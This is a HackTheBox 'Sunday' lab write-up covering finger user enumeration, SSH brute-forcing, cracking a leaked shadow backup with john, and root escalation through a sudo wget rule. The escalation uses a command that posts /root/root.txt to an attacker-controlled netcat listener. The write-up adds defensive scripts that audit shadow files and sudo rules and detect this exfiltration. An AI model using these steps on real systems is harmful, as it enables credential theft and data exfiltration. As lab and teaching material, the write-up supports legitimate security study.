HackTheBox – Sunday Writeup

Hi All, today we are going to solve the 'Sunday' machine from HackTheBox. This was one of the easiest boxes on HTB. Let's begin with an nmap scan.

nmap -p- 10.10.10.76

<<snipped>>

PORT      STATE SERVICE
79/tcp    open  finger
22022/tcp open  ssh

<<snipped>>

This was the most frustrating part, as the services on this box were unstable and unresponsive.

So, we can use the finger service to enumerate users on the box.

We can use a custom wordlist together with this enumeration script by pentestmonkey:

http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

Running it through the list, we find that a user named sunny exists on the remote machine.

root@kali:~# finger sunny@10.10.10.76
Login       Name               TTY         Idle    When               Where
sunny       sunny              pts/3               <Apr 24 01:51>     10.10.14.7

After a few brute-force attempts, we also found that the user sunny can log in with the password sunday. Let's use this to SSH into the victim box.

root@kali:~# ssh sunny@10.10.10.76 -p 22022

Password: sunday

Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ ls
Desktop Documents Downloads local.cshrc local.login local.profile Public

We are in! But after a quick enumeration we found that we cannot read "user.txt", as it is owned by another user named sammy.

sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
cat: user.txt: Permission denied

After looking around, we find an interesting backup file in the /backup folder.

sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup shadow.backup

It's a backup of the shadow file! Let's copy it back to our attacker box along with the /etc/passwd file and crack it using john.

sunny@sunday:/backup$ cat shadow.backup
<<snipped>>

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

<<snipped>>

On our attacker box, first let's combine the passwd and shadow copies with unshadow into a format john can crack.

root@kali# unshadow passwd shadow > pass.db

root@kali# john pass.db --wordlist=/root/Downloads/rockyou.txt

root@kali# john --show pass.db
sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash
sunny:sunday:65535:1:sunny:/export/home/sunny:/bin/bash

2 password hashes cracked, 0 left

Cool! Now we know the password for the sammy user is cooldude!
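A leaked shadow backup tells a defender a lot even before anyone runs john. The following Python script is an added example and not part of the original writeup: it parses shadow(5)-format lines (the two entries from shadow.backup above are used as constructed sample input), identifies the crypt(3) algorithm from the `$id$` prefix, and flags what an audit would want to know: legacy or weak algorithms, SHA-crypt entries left at the default round count, and passwords not changed for more than a year relative to a supplied reference day. The finding codes, the one-year threshold and the reference day are my own choices for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# crypt(3) hash prefixes -> algorithm names. A field with no "$" prefix is legacy DES crypt.
ALGORITHMS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
}
WEAK_ALGORITHMS = {"des", "md5crypt"}
STALE_AFTER_DAYS = 365  # assumed policy threshold for this example

# "$id$" with an optional "rounds=N$" parameter (used by sha256crypt / sha512crypt).
PREFIX_RE = re.compile(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?")


@dataclass
class ShadowEntry:
    user: str
    hash: str
    last_change: Optional[int]      # days since 1970-01-01, None if the field is empty
    algorithm: str
    rounds: Optional[int]
    findings: List[str] = field(default_factory=list)


def identify_hash(hashval: str):
    """Return (algorithm, explicit_rounds) for one shadow password field."""
    if hashval == "" or hashval[0] in "*!":
        return "locked", None          # "*", "!", "!!" or "!<hash>": no password login
    m = PREFIX_RE.match(hashval)
    if not m:
        return "des", None             # traditional 13-character DES crypt has no prefix
    algorithm = ALGORITHMS.get(m.group(1), "unknown")
    rounds = int(m.group(2)) if m.group(2) else None
    return algorithm, rounds


def parse_shadow_line(line: str) -> ShadowEntry:
    """Parse one shadow(5) line: user:hash:lastchg:min:max:warn:inactive:expire:"""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"not a shadow entry: {line!r}")
    user, hashval = fields[0], fields[1]
    last_change = int(fields[2]) if len(fields) > 2 and fields[2] else None
    algorithm, rounds = identify_hash(hashval)
    return ShadowEntry(user, hashval, last_change, algorithm, rounds)


def audit_entry(entry: ShadowEntry, today_days: int) -> ShadowEntry:
    """Attach finding codes; today_days is the reference day as days since the epoch."""
    if entry.algorithm == "locked":
        entry.findings.append("locked")
        return entry
    if entry.algorithm in WEAK_ALGORITHMS:
        entry.findings.append("weak-algorithm")
    if entry.algorithm in ("sha256crypt", "sha512crypt") and entry.rounds is None:
        entry.findings.append("default-rounds")   # glibc default is 5000 rounds
    if entry.last_change is not None and today_days - entry.last_change > STALE_AFTER_DAYS:
        entry.findings.append("stale-password")
    return entry


def audit_shadow(text: str, today_days: int) -> List[ShadowEntry]:
    """Audit every non-empty line of a shadow file or shadow backup."""
    return [audit_entry(parse_shadow_line(line), today_days)
            for line in text.splitlines() if line.strip()]


# Constructed sample input: the two entries shown in the writeup's shadow.backup.
SAMPLE_SHADOW = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

if __name__ == "__main__":
    # 17650 is an assumed reference day, a couple of weeks after sunny's last change.
    for e in audit_shadow(SAMPLE_SHADOW, today_days=17650):
        print(f"{e.user:8} {e.algorithm:12} rounds={e.rounds} findings={e.findings}")
```

Both entries come out as sha256crypt at the default round count, and sammy's last-change day (6445) is decades before sunny's, which is exactly the kind of entry a password-rotation policy should have caught. The more important finding is outside the script: a copy of the shadow file readable by an unprivileged user in /backup.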

Let's SSH in using these creds and quickly grab the user.txt flag.

root@kali:~# ssh sammy@10.10.10.76 -p 22022
Password: cooldude!

sammy@sunday:~/Desktop$ cat user.txt

Now let's move on to privilege escalation to the root user.

By enumerating the box, we found that sammy can run a few commands as root; specifically, he can run wget as root. This is another classic privesc technique that lets us read files owned by root.

sammy@sunday:~/Desktop$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget

wget has a --post-file option, which can be used to POST the contents of a local file to a remote server.

We will read the root flag using this vector.
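The rule "(root) NOPASSWD: /usr/bin/wget" is the root cause here, and it is the kind of thing a sudoers review should catch. The following Python script is an added example, not from the writeup or any tool it mentions: it parses `sudo -l` output (the output shown above is used as constructed sample input), and flags rules that hand out a program whose ordinary options read or write arbitrary files as root, rules with no pinned argument list, wildcards, and NOPASSWD. The binary list and finding codes are my own choices for the example.

```python
import re
from typing import Dict, List

# Programs that, when runnable as root, let the caller read or write arbitrary files
# through their normal options (wget with --post-file or -O is the case in this writeup).
FILE_ACCESS_BINARIES = {
    "wget", "curl", "cp", "mv", "dd", "tee", "tar",
    "vi", "vim", "less", "more", "find", "python", "perl",
}

# One rule line of "sudo -l" output: "(runas) [TAG: ...] command[, command ...]"
RULE_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(output: str) -> List[Dict]:
    """Extract rule dicts from sudo -l output; header and Defaults lines are ignored."""
    rules = []
    for raw in output.splitlines():
        m = RULE_RE.match(raw.strip())
        if not m:
            continue
        runas, tags, commands = m.groups()
        tagset = {t.strip() for t in tags.split(":") if t.strip()}
        for cmd in commands.split(","):
            rules.append({"runas": runas.strip(), "tags": tagset, "command": cmd.strip()})
    return rules


def audit_rule(rule: Dict) -> List[str]:
    """Return finding codes for one parsed rule (empty list = nothing flagged)."""
    findings = []
    cmd = rule["command"]
    if cmd == "ALL":
        findings.append("all-commands")
        if "NOPASSWD" in rule["tags"]:
            findings.append("nopasswd")
        return findings
    program = cmd.split()[0].rsplit("/", 1)[-1]     # basename of the permitted program
    if program in FILE_ACCESS_BINARIES:
        findings.append("file-access-binary")
    if len(cmd.split()) == 1:
        findings.append("unrestricted-arguments")   # sudoers pins no argument list
    if "*" in cmd:
        findings.append("wildcard")
    if "NOPASSWD" in rule["tags"]:
        findings.append("nopasswd")
    return findings


def audit_sudo_l(output: str) -> Dict[str, List[str]]:
    """Map each permitted command to its findings."""
    return {r["command"]: audit_rule(r) for r in parse_sudo_l(output)}


# Constructed sample: the sudo -l output shown in this writeup.
SAMPLE_SUDO_L = """\
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
"""

if __name__ == "__main__":
    for command, findings in audit_sudo_l(SAMPLE_SUDO_L).items():
        print(command, "->", ", ".join(findings) or "ok")
```

The fix on the defending side is not to pin wget's arguments (which is fragile) but to stop granting file-fetching tools as root at all; if root needs to download something, wrap that single, fixed command in a script and grant the script instead.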

Let's set up a netcat listener on our attacker box:

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 ...

and on the victim box:

sudo wget --post-file=/root/root.txt 10.10.14.13:8000

We should now receive the contents of the root flag on our netcat listener.

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 ...
10.10.10.76: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.76] 42964
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.13:8000
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

<<contents of root flag>>
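The request captured above is also what this technique looks like from the network side, and it is distinctive enough to alert on. The following Python script is an added example, not part of the writeup: it parses a raw HTTP/1.x request (the captured request above, with a constructed body in place of the flag, is used as sample input) and applies three heuristics a detection rule might use: a POST sent by a command-line fetch tool, a destination port that is not a usual web port, and a form-urlencoded body that contains no key=value pairs (wget's --post-file sends the raw file under that content type). The indicator names and port list are my own choices for the example.

```python
from typing import Dict, List

# Ports where an outbound HTTP POST from a server host is expected; others are suspicious.
EXPECTED_HTTP_PORTS = {80, 443, 8080, 8443}
# User-Agent prefixes of command-line fetch tools that have a "post this file" option.
CLI_DOWNLOADER_PREFIXES = ("Wget/", "curl/")


def parse_http_request(raw: str) -> Dict:
    """Split a raw HTTP/1.x request into method, target, version, headers and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def host_port(request: Dict, default: int = 80) -> int:
    """Destination port taken from the Host header (IPv6 literals in brackets are not handled)."""
    host = request["headers"].get("host", "")
    if ":" in host and not host.endswith("]"):
        return int(host.rsplit(":", 1)[1])
    return default


def exfil_indicators(request: Dict) -> List[str]:
    """Heuristic indicators that a request is a file upload by a CLI tool, not a browser form."""
    h = request["headers"]
    indicators = []
    agent = h.get("user-agent", "")
    if request["method"] == "POST" and agent.startswith(CLI_DOWNLOADER_PREFIXES):
        indicators.append("post-by-cli-downloader")
    if host_port(request) not in EXPECTED_HTTP_PORTS:
        indicators.append("non-web-port")
    body = request["body"]
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") \
            and body.strip() and "=" not in body:
        indicators.append("non-form-body")   # raw file content, not key=value pairs
    return indicators


# Constructed sample: the request the netcat listener received above, with a made-up body.
SAMPLE_REQUEST = (
    "POST / HTTP/1.0\n"
    "User-Agent: Wget/1.10.2\n"
    "Accept: */*\n"
    "Host: 10.10.14.13:8000\n"
    "Connection: Keep-Alive\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Content-Length: 29\n"
    "\n"
    "constructed sample file body\n"
)

if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    print(req["method"], req["target"], "from", req["headers"]["user-agent"])
    print("indicators:", exfil_indicators(req))
```

Any one of the three indicators on its own is noisy; the combination, coming from a host that has no business uploading files, is a reasonable trigger, and the better control is simply not allowing servers to make arbitrary outbound connections.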

I also tried replacing the /etc/passwd file on the victim server with one containing our added user, using another wget privesc vector. For some reason it failed.

Nevertheless, we grabbed the root flag 🙂 Stay tuned for the next writeup!